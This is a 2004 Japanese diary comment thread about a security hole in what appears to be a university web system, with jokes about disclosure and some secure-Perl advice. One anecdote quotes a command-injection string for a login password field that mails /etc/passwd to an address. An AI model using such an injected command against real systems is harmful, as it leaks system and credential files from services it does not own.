|
ツッコミ
[[セキュリティーホール発見]]
じゅうぶんに、ゆすり・たかりの材料ですね(w
っていうか、どうせなら提案書書いて仕事にしなきゃね
ま、全て事が方付いたら、どういう感じになっていたか、どこかでの宴会ネタにはしますよ。(キット・・・
特に濃い所のネタにはちょうど良い
うはっ。 がんばれ〜 しかし、最近、この手の出来事多くないですか・・・(汗
Date: 2004/05/27 10:38
From: ダメ猿
X-URL: http://www.tfg.ne.jp/~monkey/diary/d200405c.html#27-3
セキュリティコミュニティ的には、善意の第3者としての、セキュリティホールの指摘はしない方向に向かってますねぇ…
不正アクセス禁止法違反になったらこわいしー。裁判いやだしー。
そうですよね〜。
でも、この場合私は、「被害者」ですからね
プログラムでいったらまさに「NG」じゃん、それ。(←デバッグ…って言い方になるのー?)
その点、うちの大学は大丈夫のようで。学外から大学のweb見れるけど見れないとこあるし。けど、見れる内容って少ないわ。
Date: 2004/05/27 15:22
From: Ikegami
お疲れさま〜。とりあえず直ったようで何よりです。本格改修のときに、また穴が開かないといいですが。(わら)
Date: 2004/05/27 19:41
From: ともちゃ
結局、KUDOSの方で、3人の方と、いろいろとお話してきましたにょ。
既存の問題点も含め、気になったことの大半を話してきました。
あとで、どんな感じになったか、かける範囲でかくにょ。
にひひ。
Date: 2004/05/27 22:01
From: 昔がたり
今は昔、Web認証システムがありました。
男>パスワード欄に;mail foo@bar </etc/passwd; って入力すると_まんま実行される_のですが…!
サポ>パスワード欄に英数字以外を入力することは仕様に反します。サポート対象外です。
男> あほー! (-_-#) そういう問題かよ!
男はサポと話をしているのか詭弁家と話をしているのか判らなくなりました。
めでたくない昔話でした。
雰囲気的には、デバッグ環境が放置され、問題になったのではないかなと推測しましたが、真偽は今のところ分かっていません。何にしろ、システム構築をした外注業者はあまりにも安易な所に認証も無しに放置してしまったと言うところに問題点が置かれそうです。
関係者は、レポートとか報告書とか仕上げるために、徹夜で作業しているんだろうか…。影響範囲も夕方の時点では判明していなかった模様。とにかくガンバッテクダサイ(他人事のように言ってるけど…)
Date: 2004/05/28 10:10
From: Ikegami
1998年の暮れには、理工学部3,000人のID、パスワードを録られているしね。
Date: 2004/05/28 12:27
From: dartei_harry
おつかれさまでした。
ircで聞いて心配してたんですが、
それなりに落ち着いてよかったですね。
結果れぽ楽しみにしときます。
きっと、これ以上の結果レポは無いかも。
これ以上書くのも不味すぎる予感。
ううむぅ。まだ、穴があるのですが…。どうしましょ(−−;
あれから数個発見。マスタデータにも…(死
Date: 2004/06/01 03:56
From: 昔がたり
今頃目が覚めた。
セキュアプログラミングの神から啓示があった。
http://www.ipa.go.jp/security/awareness/vendor/programming/a04.html を詠め。
Perl は -wT で実行しろ。
use strict もやっておけ。
exec()するところは全て注意しろ。
汝この教えを広めよ。
神様、解りましたからもう眠らせてください。
※ ブラウザキャッシュを持っていることが多く,投稿後なかなか日記には反映されませんので,強制リロードしてみてください
※ IEであれば"Clrl+F5"で強制リロードが行えます
※ 特定のリモートホストからの投稿は、認証画面が出ますので、ID及びパスワードに 'test' と入力してください。
HNS Board-0.1.1 Copyright (c) by HyperNikkiSystem Project 2002